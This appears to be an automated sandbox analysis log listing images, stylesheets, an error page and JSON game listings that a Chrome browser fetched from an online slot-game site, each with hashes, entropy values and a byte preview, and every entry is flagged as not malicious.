                                                      SHA-256:243406DC9776577510746308A2816DB585B4ABD09A64E1C761654316C0D9038C
                                                      SHA-512:9149B9E16B06D6508EBEBBF78A59AD26EB15FF35084C2BB6BE8F08795884F4A914E24689FC2402EAAE46819EFDDC37281B7D778C92D2BF66F8939A4FF9F02A86
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a...............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:EDCB7121599E11E889018115615FE670" xmpMM:DocumentID="xmp.did:EDCB7122599E11E889018115615FE670"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EDCB711F599E11E889018115615FE670" stRef:documentID="xmp.did:EDCB7120599E11E889018115615FE670"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqpo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3961
                                                      Entropy (8bit):7.77018806812612
                                                      Encrypted:false
                                                      SSDEEP:96:3Xw9lXDi8Y6cAmmwh/7cmF/8IPFQT+5lZ:wXDi8ncAmmwpQmHD
                                                      MD5:FCF051655A112FDFE68F5732890C57DB
                                                      SHA1:BF68427B04854B04838D7FC222D17FD2937D3A15
                                                      SHA-256:3B458237274D63ECE50DD3CE3305D4D85BA388D165DD343D583428D15FC1E04D
                                                      SHA-512:56ECDDF3A36E48966286CEF9FC3E1E1BEEA7470397C7DE6CB53C173A250BD14E5916EBF8AA05FF72E8DA7F266AE30FB592E0EB44C44BCD094DB3C85BC7F75FCB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...O...........[.+......[.+I.?".......................?........F..N..p.!......o. L..p. p. O..p.!...p.!p.!p.!o. s.#...J.....P..;..r."l..q.!......N..P..p.!p.!p. p.!p.!l.....F..O.._...........Z.+...T..Z...........q."n..P..h..V..=.....U.....`..h..R..d..^..X..\.....p.!...p.!p.!q.#p.!p.!p.!p.!p.!p.!...p.!p.!p.!p.!p.!...m..r.!k.#..._.(.........Q.....B.....1..*.......}..cf.%.................@......b.'p.!...p.!.........k..h.%...j..].*|.5b..]..#..i..n..e..O..y./U....Jp.!p.!p.!p.!p.!m..p.!p.!p.!p.!......p.!...].*..d...t.(f.&......].)b.'..Cg.'..p..Ra..T..k.$i.$B..............p.!......E..y./..NZ.+......j.#m.#...E.<.....wc.'..S.........a..T..... .....G..F.....O..p.![.+......R..>...........^.,q.!w.#z.$M..s.$r.!Z.+u."Z.+o.....[.+v."r."...m........q. j.....=........h..r....tRNS..............l.... ....=........8................Q.............oK........................x][FA.($.......$...........~tQ2*.....jC.......................vsnIF8......................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality", baseline, precision 8, 56x23, components 3
                                                      Category:dropped
                                                      Size (bytes):1075
                                                      Entropy (8bit):7.378098254985596
                                                      Encrypted:false
                                                      SSDEEP:24:O7A+di9YMWn0o0XxDuLHeOWXG4OZ7DAJuLHenX3PQ06WGOBMgxEDXc93kJpjoEn:GAmi9YM+uERA/6WGOmg4sUHjoEn
                                                      MD5:427C78075FFBD778B669EDA120AA3489
                                                      SHA1:34B4448B0426E4B471BE3FA2C9E8ABD901D0E2EB
                                                      SHA-256:2C34325364803F26A2743CB62F48677E9E83A96005131A7EEDF97038D6CF5588
                                                      SHA-512:0CC9E91645FCC3F264EE9D672219C5034499CC78D4EAC17E1DDC96A0821935547B3BECFDE97612289A078094AB8DC2B2F498D5D386D1A522711C5C16F700AD28
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.....`.`.....>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3u....%e,.!...=?.e...l.!v.L.8....A8....W.........1...j..Z.t..1 O#.......;..s...Eto.E....4m.a..M..BH.. ...<..cT..Age......L.,.(..wm....?F....f.......S.......[._.Q.i#...d...~g.......O[s.F<...h&[.x.L.C..3..RW/.-^.(........2D.,....T..'.R.{...6.eu.....rY.Hp...W.G2......_.....v.QEQ.#".R..S.$t=2?:.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):28956
                                                      Entropy (8bit):7.987627654784631
                                                      Encrypted:false
                                                      SSDEEP:768:XXnmvHydB9GkFC5UeCWTMuibEtiVcs/81lkNAynek4G:Hmg9yCWkN2sk1lkAylj
                                                      MD5:66D9D7CB8A8E10E4DD94D9DAC473BF4E
                                                      SHA1:5AFC5FF32430D142F1351A64AD2843C71931CFCA
                                                      SHA-256:8691578B167478AF12787D900A04FD7890666833BDF0FA530D0D69C366B6A02F
                                                      SHA-512:F8DC62495B5FCB658D7592B0911AB272AE73F607528BFFD85C5C6AC2AA22E2261B73FDF317D015DAEB0F14ED38602FD138BF056E78BA4663C8705638925026E2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE$........+"!...;::*7\BAA<0/3()'2R....013...6. .....ROQ)........_4A...B.).../?l...........!(7 )H.....L%2T,9...\WYjBS....vy...f`b..tu|...J626@N;=^FGLJZrCGh8[......c;J.6DK|.NXa.8=b.......PHFiF,...tkl')(T........Z..Et....4Q.S@:...jc.0JxXakhio.,BMZWd~........(?Ezc....Dh.......wR9..MFU.P].`h.g..[:.0E].........~v....TK._5...cME._Xq}.mTQq....XQl.....TV~<W|_).co.;Si...unbky..m.{k3.&...V............}M&..G w..+a.....x^]t...wH.mF..3H,.v=..j)..q..L....w{.Dl.k{..a.:.&..w..I.u9^x.B....ke.....8.H...^ ..5i..T0.$w}f|..Y.....m^q.....HUJp..y.....B.*.hj.....{.m...Wp\.._~.}Jb.i...6......1...../O)....~... E........q[.J.C<h7P.....]";.0R.pkP....y_.1.b~...b.Z.o.H.C.l.....~u..o..@.<.....P.R&...v.{..~.zl..d.[...fa|...8..Y.[..}.*.....%....m.IDATx.T....Q.....\h.jsv1sA..r8'.M...Fy..4.^.$4.$)/..E.R.4..)...J....+..?...].;..y~sf.....y67aqn..i2.R.e..&c&7....._]a.T..q.I+n...!..`p).R.a.!|.:0.}..[...`".B.........(.=.y....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29565
                                                      Entropy (8bit):7.987356198220607
                                                      Encrypted:false
                                                      SSDEEP:768:GEKIKoRwYCecPiTMuwg8KbOOlkmzClO/W9:NzKo+ehTMuwDWkECec
                                                      MD5:1958C204B183FB038A7081726033D230
                                                      SHA1:169BF349D4D451090F4038EA1B867C34500F372F
                                                      SHA-256:5067CA03CEDA5E810D686B72228E44DD0E5A1F08C0D3A608474009E17F3C1BE8
                                                      SHA-512:F3359687BE4174E8BE3BAFCB7A4ECCEE14F2CEB67DD4D0C9C54A2F3483A6575BF041DDC6A41C172F364D9513BD254EED493B88D793C08383C3FFE1E9369511C8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/sky/sw_dhcf.png?ver=1691141966
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...U....u...p..+.....g.....^.......4 ...."......|..3.....&.......7..h.....V...9............w...a.... .........,.....Q......i...E.....4................s.........E.L............p....../D...N...&...~"...:..I..G..........,..A....R...i.....!....]..u$......7B.....}1..R..\........O..|...0.^.k ..:...E.r...>.o..i...........9..a......W....8..E..)..o.........L._..8..d.._.....T...)3...|..q../._...}..+..].........g...J...D...."....#.......]\.4..H.....8..Q..X.....R......2.omS ..H..D.i84...o1..{.A0......r.W..U..JI...m.....j..y...}....B.....*...,-%............~...X.G.K5...+qK..d+;..vzK...ZM.]0..31..*......64....^..&#.x..`^.$.......??cTJ.r@.tr.......YX....:9.SP...).HB..F..*."..8......dc..>..5....&.;..a..D...K(....H...}.e....k=ws(.[....|w..M..N.......s}'...2... .IDATx..{T.....HM|.Pv.Qr.....BlHI.*H69...mB.......$;r.pW..6...T...:R)....O;.z..u..z.N...N........g...|...{...1$.|_..s}..T*U.2.mNNNV.....B..7j...Fmm..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):20772
                                                      Entropy (8bit):7.9735284418218075
                                                      Encrypted:false
                                                      SSDEEP:384:FcxduA+YKPVkl5ct30ugZyGBK2SWxiYr2t0oUxia6+TWAks4mXaODk:C+9SuVgbAZWximW0oU8QW/3ODk
                                                      MD5:5C333F9BAADFEB4764C65D4AD4506049
                                                      SHA1:34E7BCE39EB29B61F1E0107D12A33DF72996A3D4
                                                      SHA-256:D831F9E5CB666D1BC4535C44697461439421D3B584E5E6E83C088F696FBD6CA0
                                                      SHA-512:52394575A36C44C1660FD9A7816DBE0B6135F0DE233589825E8BD42CEC8005F7A595E825DECE4884984C9A8ECE57E260CB8C7CD1C888DAE18ACF963C7386A757
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..3.....<..;..K..N..Q..C.(Y>:.@,.?#.< .9..6..5..Z.j..|}.`b.8l.?w.CP.=..5#.8..20.9A.6<.6h.H|0iJ1d.....{n..s.bP.I>.0*.......g6.........{.v..w..z..l}.eu.n..................................................}..u.yk.pa.h\z^OrUDiJ8\>4R6(='"$..3..@%.I+.U0.j<"R .d).n9.|E..K..[..g........%..7.?............p..`..E.......y..c..J...+..:9.^T.JC.nf.ae.S=.cA.eQ.kW.t_.{c..m..s..|.....n.nN4..D..T..e..b..\..W..N..D..=.u7.i/.]'.P..D..>J15..Q.t<..K..Q.Y.s(....h.lV.}b..c.a%.-.|..#...5...C.v$.T..z@..........t.o..d..afIF.uG</D..0 .@,&f2-r22v# [$.i..b..N;.TM&QY;RmM\{Rg.R.k7.R)w_>nmJ|W@.I8.L?.PF.J@.B9.<6.>3.xC.g4.b-.Z".M..............\.B......x.._.S.E..7.4.A.P..[..Y..o..m.......z..u..o.k.h.a._.X..T..J..F.w;.l2.f0._,.W(wO&lK.^>.N6.&.&..4..6..4......M.IDATx...|T....[...I.H/.....^Uz...$$.fE....E... RC..( (.BG...{.tBoIf..{d.If&........L.=q....o.=..(.n$Q.iu[.. B.1~...Y.>..............C.!PV..BA..`)d.ThxJ..=&.j.3..%.W..C.1.Ch.\..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:assembler source, Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):13576
                                                      Entropy (8bit):5.025154971998327
                                                      Encrypted:false
                                                      SSDEEP:384:wFiFEFI9FSFiF+FyveFfcFjFDFyrFnNFGFoxcFzOFUFkbVeVG1rL2PH:wFiFEFI9FSFiF+FyveFfcFjFDFyrFnN4
                                                      MD5:03CD41C617BED986D049C0080F7E2941
                                                      SHA1:1E4FDA36B5881302B3BD98A15AA223018D0CA006
                                                      SHA-256:A20CAC205C319997EA78A9E8E4206A6C526B7D453511EEDCDE986DF00F819942
                                                      SHA-512:60A42F402D3832B1E6F5B979AD24F66F74DCFFFB27D24E89B57F613E0C2A736772DDB8450386172CBE6F86BCF6DB19D7694A68D733484AD498E04175DD6F5AE7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=1736392866
                                                      Preview:@charset "utf-8";..content {. display: flex;. width: 1000px;. margin: 0 auto;. color: #FFF;. background-color: unset;.}..gameplatform {. width: 100%;. background: #272727;. border: 1px solid #363636;. border-radius: 5px;. margin: 5px auto;. height: auto;. box-sizing: border-box;. overflow: hidden;.}..slot_header ul li .hd_new {. position: absolute;. width: 23px;. height: 15px;. right: 2px;. top: 2px;. display: block;.}..podloader_unite li {. display: inline-block;. width: 92.8px;.}...podloader_unite .egame_text {. text-align: center;.}..podloader_unite {. overflow-x: unset;. display: none;.}./* platform without swiper */.#game_plat {. border: 1px solid #363636;. display: flex;. flex-wrap: wrap;. width: 770px;. justify-content: flex-start;. border-radius: 5px;. box-sizing: border-box;.}.#game_plat li:hover, #game_plat li.active {. background-color: #fff;.}.#game_plat li {. position: relati
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 269 x 79, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):15513
                                                      Entropy (8bit):7.977043692770378
                                                      Encrypted:false
                                                      SSDEEP:192:Kp0947zwW548o0qGqTqwSI/y8PniV6wN68I2nfKgLyzpbdTQzv3aOyYNqbIkvGyk:+09I520qGqtS4niZx3fK1NBTKBRqbIkO
                                                      MD5:79C9CE3096B81123A25BA5DAC9F361B9
                                                      SHA1:9908604A4E3BDC991784199B319CBA162255BCB9
                                                      SHA-256:DC2129A4C7C9E426962A3A36D8180A89C1F931230CDF83ECD915B4BD635AA554
                                                      SHA-512:902039E1394BA0A6E9C5AFCB86EA420DB1F6712D6FDCEF76879BD882EF7B682D4D388370EA9081026C38AD6E93BAD81177885C412FAE35D9B5B56A99B4D667C0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......O......+`.....PLTEbO.......fR0...888.........jV5:;5......bK+kU....eM-874==;WE$....p@..........l>....zGoX0.}J|d8RA!.vC......\I(.sDy`4.j:fQ(....f8sY3.h?)*&..M.....O433$#%.....Q95*#....UT......yJA1....,.... -..(.....<*.u]0%$.4+)...1'.8!.m.....x...r>.#.9*.J7....DDCaH"J/.3/ ..WhgfG;"...F..D .Q<..... ..z...TF-.\7..MKL;..{....a/$.1:0a....ppp..oZB....r^9B1'd...qo......d..bya?D%...HVWU.b/."'."".p.]vkV.tR.....rTF@+.........qD{yx..o.k.qcY8%uX#....l.ECZ9......X.SK.D=).....g.VW.~V.z.dd.aa_PD.EF..`jM.ZP5..w.....T...hiK@2.n0q......j...jk.JHyjGn[C.s]Z.44....]a_.ieh`MW+.......{.iK..y.vv.hK.0).{ .QF89.+$..........^.US.\&..._:8....}..l.OG...50xH!....vu.H1.~{..m.[Z.~N.v3k=.....D..8.W6.....j6(...~d.HtE?.86...~.....b wE.....T.6!..>....N>.i>oB;Q4t....^.~....;i-..9TIDATx.T...Q....f....a..J..".Y...1.r.E.VC..L..!.u....+..@.E`...A..)".E.l.......z.3..0.:.9...1..z....oVY...j.&.8 I.EY.......JDq..;s......".~.nwty...K9....P...3..4UU.E...$TL&U.4.I
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 256 x 240, 8-bit gray+alpha, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):7013
                                                      Entropy (8bit):7.935240567211898
                                                      Encrypted:false
                                                      SSDEEP:192:92XiIsTugcTnouLuIXdj7Z7rgmlWRI1ie+BVtNzDby:AmOTnwCnZftW61ie+BV3Xby
                                                      MD5:40BF25799E4FEC8079C7775083DE09DF
                                                      SHA1:4FC6B1449C73F5D10489C104225EBE326A4016BA
                                                      SHA-256:E75B27211E16FCF94715168001BB7055CA376D46F928110BA3D0825232452E5A
                                                      SHA-512:51C9E46224098E9270BF51BEC93E0528B5E726A632A1DE57863FBA531D914A9DB1D3FB07D22CEF756F6FC9E999BF08043E73BCA6225A9AB7EFFFE2904105C388
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............E.r@....gAMA......a.....bKGD.wd......tIME......6..F...tIDATx...leGu.?w.K..>CKd.*.Ci.C.. .VynK.$....T.*.I..BM RE..H.P."IAQ....H QP..QX..;J.B..^.MIQ~I.VE.......q...;....=...z...33wf.3s...>.G..o.......4.^.dL.21.L.$....`..l...[...~&.+...&.@.....G..`V.a.g.......'.al.N.X.....b.0...t.(..P..5RH.&.<....-`....r.2..2..)....Kz...,.$[.Rp..R.s.u.8r.....]aj...#z....T.MS.$.\O....3.!.ZP...Y..o..)D......N...#Y.2.:....)P}..._U.S.2.L..]...a?..sz../l.....lj..<.2......:.+.g.../........@........px.h8.z.|.a...Qf=....1f.....;{.......)!).....f.B=.&5.]....f.O}..(..0.o.Y..03(K.dl1U.+...LM.....z.{..D@...>]...D.-o..m.....u.. ........]Z.V.,.Mm.y.h.U.z...f..i=@].S..tT.o6.g%.S.B..._qw).DP........px.h8..4.^.../..._..G8...{.J........a. .. bR.<.c...r........ .@)....?..zM...jl....*.w...V|.}}...C...!4l.t._`...r...c..0..,@.%6.......p-.n.....>(x...h...i.@I...zJ..y..ts.Y...@.e.e...C.r..jm...C.&...[..LM.%m{...e^.3...JM3.@.....X7.mkA...."....v...2..Mu.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2874
                                                      Entropy (8bit):7.836975522103957
                                                      Encrypted:false
                                                      SSDEEP:48:fnX85aLddBvzrTS/toRGGWz38An6eWZDH/FpdaZ9gTIoIJvtuKX:fVLd3rTS/hhzmVH/UfgTIosX
                                                      MD5:2078DC1E2CFF31CA25A9B37D9CA46A82
                                                      SHA1:EE84ADC8A708CAA148EDE4B55B6FCD09734E480D
                                                      SHA-256:70AD3C870767A9182D1E2C428A785EB29C917950FBBF93005F0276ABCCB84F11
                                                      SHA-512:D9A4C3392E1185FA425B5DC55D66D4B2D539D370B4B98C8F13FF7794617629634222A187963AEADC1D3200414E1B47DCC9BCE8B0FCC8CDF9E71B97F8F2B4736B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/78_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE...,..#..#..(..&..$..)..%..)..(..*..#..+..&..(..'..$..%..&..(..+..)..*..*..)..$..(..(..&..)..)..+..)..&..(..$..*..)..(..+..&..&..&..)..'..+..)..+..(..#..,..(..*..%..(..'..(..&..%..+..&..+..$..$..%..$..$..+..(..)..,..*..#..&..%..)..'..&..+..$..%..'..#..$..'....c....DtRNS...@.@...0 ....@..0..@..p.``.`.......`P..P....P.`..pp......p..[.....IDATx...............................:fq...0<..J..Zn...a[..,.....\ ..:1.r....1.{.!"""""""""""""""""""".......u.d.T..cCz8IJ[..~is...W#L..tzh..K..c.|..t.u.s.h.... "..RI...#.....D.q:.8m.\H:........P.\...|.Bt.)&..>....2..x........f..j....baFX...B.v.c.%..1/..Ya.F...q6.5.x...p.~~c..+L4......-.h3LGA..........0(...D..4.....I1A.K..36.a.V.).^.x...!i....0P.B.[4..7>....z.Ia<..y.Ym..ap...N4.c..0V7..z...z....`.;.....;\...{3)&.d..A.H..(5N..B8..L.RE.P..K..-..oo.0...a8....6.vj..um5M..?hB.J5..H|...h2...r.........s..)[.i.!1.R#...1..-...%.]..8=........v.1hF....!.fP...0..Q.....w[...b..9Rn.Qoap..#
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 700 x 255, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):62478
                                                      Entropy (8bit):7.983174535112712
                                                      Encrypted:false
                                                      SSDEEP:1536:QJGciJ0HAse576G1MR2uW3VWkwl7Q31hSaeUWOPAy:+GrsdrGnu7PwSTUR4y
                                                      MD5:5D6A4C8918A36AB4327A3D2B87F9904D
                                                      SHA1:152CCB077519306951CFB872213F2BF15DBF4DBC
                                                      SHA-256:CD1093860EBC277B890410D37A032144F1FB07EA68109DC7E63DEA672E37F877
                                                      SHA-512:4849710A18E4E9CA52D82F7BC920460EB4B8684F27852764757BC4FA4659D69621FA64C72268B5E76B10FA7008DC67D656D78103C76CD71574C1F3BF79E2D225
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............$7......PLTE....$...........(..../.i.)..........................$........!..-".......)".............>'....3#.............2.&...8$"E)."./...*.... .....:..).....'N)....5.B..9<=;3.-74....&&$0-C:.$ .+W,....2*CPG1(... /a050,*(%...9H?UXYNE&4(.N_U...NOP0A9_aaKYMK(.FED......VdYKD.n{k6k2YQ,w.tc[!d\9sstWN.....<7.W %B.:v8..-...D:1tl?...pg+Zl^WI=.....jjh...}}|.|=.........h=/.....=...[2#....m]S.....'N...xkY.$'..erd.we.2e....WG...P....[.O.....(pYf\O@.=x5.d'....yE4.S....?K....OL......vQE...j..$d..~m.........F.B..x....+0.C".._.G ...M.G..D...B.2RV.......VG.J&.....x._^..5.6....Njo.jY.......#2_.U.m.Y&.vv\..#Bmw.6#2?..Y...1~.]}eov......V....s.h.{....CF]...d[.k'......C.`......2X...l.w>..Q.........\&....,.c..l...J...*......i.l.........y...7....p~..>...h..JW.....}..S..........IDATx..A..0...+...=....N.."..k.......O....2.....qB..,.....=|........Uj..j~..U....qQvFm.ZW.^.B.:...=..C/Q..x=..|F.2...C.....w..O.k..j..0.C`.K|...5|$..7c.~.'.....F4"...Rl...FpQ..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text
                                                      Category:dropped
                                                      Size (bytes):2327
                                                      Entropy (8bit):4.58172032326599
                                                      Encrypted:false
                                                      SSDEEP:48:bo6RfPyfX4XnRg3ylD95NJaY2EUVonNTZR0X7cBJ2T:0eP8XGg3ylD7NJaZEUVo5ZCQBJg
                                                      MD5:2948EAAE4BA79062CF3CE74EC4861505
                                                      SHA1:4D18AE54F8B8AA6D86ED00F17387C20273F3680C
                                                      SHA-256:720B561B8CC04DAA2C0814CAEA982FC54E3EA2EB2B15E95EF2BC1C4E36576F17
                                                      SHA-512:7626D9D8AE3B455068CFE0147022458D8B4B94D133EAB07BFC4328E3516E7C45722BE2FC9D4F988D500328916F8FBB4DC3109B70B00F19FC8EBA9D5C4DDA8E69
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title>Page not found</title>. <link rel="icon" type="image/png" href="/images_plus/main/favicon.ico" sizes="16x16" />. <link rel="stylesheet" type="text/css" href="/plugins/bootstrap/bootstrap.min.css">. <style>. body, html {. font-family:Arial;. color: #fff;. background: #1f1f1f;. }. body { padding-top: 100px; }. h1 { font-size: 36px; }. .logo{ margin:0 auto;}. p {font-size:18px;line-height:180%;}. @media (max-width: 768px) {. body { padding-top: 50px; }. h1 { font-size: 50px; }. }. .redirect-info {. font-style: italic;. font-size: 12px;. text-shadow: 0px 0px 5px #fddc63;. padding: 10px;. }. </style>.</head>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 256 x 240, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):7013
                                                      Entropy (8bit):7.935240567211898
                                                      Encrypted:false
                                                      SSDEEP:192:92XiIsTugcTnouLuIXdj7Z7rgmlWRI1ie+BVtNzDby:AmOTnwCnZftW61ie+BV3Xby
                                                      MD5:40BF25799E4FEC8079C7775083DE09DF
                                                      SHA1:4FC6B1449C73F5D10489C104225EBE326A4016BA
                                                      SHA-256:E75B27211E16FCF94715168001BB7055CA376D46F928110BA3D0825232452E5A
                                                      SHA-512:51C9E46224098E9270BF51BEC93E0528B5E726A632A1DE57863FBA531D914A9DB1D3FB07D22CEF756F6FC9E999BF08043E73BCA6225A9AB7EFFFE2904105C388
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plugins/jquery-ui/images/ui-icons_777777_256x240.png
                                                      Preview:.PNG........IHDR.............E.r@....gAMA......a.....bKGD.wd......tIME......6..F...tIDATx...leGu.?w.K..>CKd.*.Ci.C.. .VynK.$....T.*.I..BM RE..H.P."IAQ....H QP..QX..;J.B..^.MIQ~I.VE.......q...;....=...z...33wf.3s...>.G..o.......4.^.dL.21.L.$....`..l...[...~&.+...&.@.....G..`V.a.g.......'.al.N.X.....b.0...t.(..P..5RH.&.<....-`....r.2..2..)....Kz...,.$[.Rp..R.s.u.8r.....]aj...#z....T.MS.$.\O....3.!.ZP...Y..o..)D......N...#Y.2.:....)P}..._U.S.2.L..]...a?..sz../l.....lj..<.2......:.+.g.../........@........px.h8.z.|.a...Qf=....1f.....;{.......)!).....f.B=.&5.]....f.O}..(..0.o.Y..03(K.dl1U.+...LM.....z.{..D@...>]...D.-o..m.....u.. ........]Z.V.,.Mm.y.h.U.z...f..i=@].S..tT.o6.g%.S.B..._qw).DP........px.h8..4.^.../..._..G8...{.J........a. .. bR.<.c...r........ .@)....?..zM...jl....*.w...V|.}}...C...!4l.t._`...r...c..0..,@.%6.......p-.n.....>(x...h...i.@I...zJ..y..ts.Y...@.e.e...C.r..jm...C.&...[..LM.%m{...e^.3...JM3.@.....X7.mkA...."....v...2..Mu.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):3433
                                                      Entropy (8bit):5.027448140828748
                                                      Encrypted:false
                                                      SSDEEP:96:6muOBOhjag3VP7QR+VBfEO6NodGQhlYxBrj:6muOBOhjt3VzQkVBfEO6NodGQ0Hv
                                                      MD5:108DE3688348603249E2EF4FF76E683A
                                                      SHA1:00578BE1BC0CF509E92C1F426912220B1A50112D
                                                      SHA-256:AAAFD6456F786EDC4C5E15B241494B7695C81D1D23DB593950485F9F3D47A697
                                                      SHA-512:BCE8325D4B7E47D88080428FEEE8F569384B4BF64E315C9D17AF3FF151D7FB1F8331FC2922EE9442436B202237BF1D0E377FFAB2E523F8D7783590ED7184763E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getegame?platform%5B%5D=224&page=1&gamename=&gameid=
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":38229,"name":"Treasure Bowls","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_TreasureBowls.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":38228,"name":"FaFa Fortune","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_FaFaFortune.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":35972,"name":"Wonder Woods","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_wonderWoods.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":35971,"name":"Treasure Skyland","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_treasureSkyland.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (1434), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):196335
                                                      Entropy (8bit):4.691383562126578
                                                      Encrypted:false
                                                      SSDEEP:3072:olpkvlaDD/DCD/DCD2iqWCPrMBq1rGPuAZDDD1DDWoST+piMhrlon5Blu4hK:CkbW0sNpiMx
                                                      MD5:BC45C47C99FE4D26B2B24E46CEC399AD
                                                      SHA1:221067A4147ECE74B03934528AD61BCD4026E477
                                                      SHA-256:4A65C2AF68E89944C3DA128C9B329596D930CE09DC9B8BA726B640D812E1FD88
                                                      SHA-512:1658E474170022D40E698A422F024B4872BFF33C78AF1DBE98DF3A6A99A0F1CD1EB36725AC9FCA7BC1264EA491D0A19A2EE0A3A952ADBA4ABA3242C06F830F93
                                                      Malicious:false
                                                      Reputation:low
